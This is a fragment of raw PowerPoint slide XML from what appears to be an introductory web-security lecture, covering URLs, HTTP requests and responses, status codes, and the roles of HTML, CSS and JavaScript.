              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5814895-08D4-D481-E63B-C236DB57CD09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2040238" y="1104775"/>
            <a:ext cx="3239100" cy="2599500"/>
            <a:chOff x="2040238" y="1104775"/>
            <a:chExt cx="3239100" cy="2599500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Google Shape;258;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0483DF81-9B3D-F8E5-318C-49A717B38B46}"/>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 /pictures</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    ├── 1.jpg</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>draw?shape</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>=__&amp;size=__</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11" name="Google Shape;260;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{388BB692-88B9-BB8C-0BEF-1B681EEA987F}"/>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12" name="Google Shape;261;p40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9F34456-4669-08F1-8E21-4DEB44EA90F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2040238" y="3737100"/>
            <a:ext cx="6200700" cy="400200"/>
            <a:chOff x="2040238" y="3737100"/>
            <a:chExt cx="6200700" cy="400200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="Google Shape;262;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0928F5C-1649-45D8-6D89-65C1F04271D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2040238" y="3737100"/>
              <a:ext cx="6200700" cy="400200"/>
              <a:chOff x="2040238" y="3737100"/>
              <a:chExt cx="6200700" cy="400200"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="Google Shape;263;p40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73D21AB5-7C64-67B4-A51C-4688B6E6E317}"/>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16" name="Google Shape;264;p40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{709E3792-5F25-A4D1-0A94-8DB6EEF59EC0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:stCxn id="15"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14" name="Google Shape;265;p40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4984FDC9-88EC-4635-EFC8-2D2C9AFD6844}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:endCxn id="15"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HTTP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Google Shape;30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15" name="Google Shape;31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FF0000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: How do web browsers communicate with web servers?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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316" name="Google Shape;3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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="Google Shape;322;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HTTP (Hypertext Transfer Protocol)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A protocol used to request and retrieve data from a web server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A secure version of HTTP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Uses cryptography to secure data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We’ll see HTTPS later in the networking unit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HTTP is a request-response model</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The web browser sends a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to the web server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The web server processes the request and sends a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to the web browser</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Google Shape;32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Request</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;329;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path (possibly with query parameters)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Method</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: Requests that don’t change server-side state (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1" dirty="0"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>” information from the server)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: Request that update server-side state (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1" dirty="0"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>” information to the server)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Other less-used methods exist (e.g. HEAD, PUT)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Today, GET requests typically modify server-side state in some ways (e.g. analytics)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>GET requests do not contain any data</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>POST requests can contain data</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Uninteresting metadata</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Headers: Metadata about the request</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Example: “This request is coming from a Firefox browser”</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Protocol: “HTTP” and version</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Google Shape;33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Response</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;33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7" name="Google Shape;337;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Protocol: “HTTP” and version</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Status code: A number indicating what happened with the request</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: 200 OK</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: 403 Access forbidden</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: 404 Page not found</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Can be a webpage, image, audio, PDF, executable, etc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Uninteresting metadata</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Headers: Metadata about the response</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: Date and time</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: Length of the content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Parts of a Webpage</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Google Shape;343;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49" name="Google Shape;34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999999"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: How do web browsers communicate with web servers?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="999999"/>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Clr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: A markup language for creating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CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: A style sheet language for defining the appearance of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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: A programming language for running code in the web browser</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Google Shape;35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Introduction to Web</a:t>
            </a:r>
            <a:endParaRPr/>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brief history of the web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What’s the web?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>URLs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Parts of a Webpage</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Security on the Web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Same-Origin Policy</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9980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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Google Shape;356;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HTML (Hypertext Markup Language)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A markup language to create structured documents</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Defines elements on a webpage with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>tags</a:t>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Tags are defined with angle brackets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;&gt;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&lt;img&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> tag creates images</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&lt;b&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> tag creates bold text</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Google Shape;357;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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="Google Shape;419;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CSS (Cascading Style Sheets)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A style sheet language for defining the appearance of webpages</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>You don’t need to know the specifics of CSS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Very powerful: If used maliciously, it can often be as powerful as JavaScript!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Google Shape;42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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="Google Shape;4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427" name="Google Shape;427;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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A programming language for running code in the web browser</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
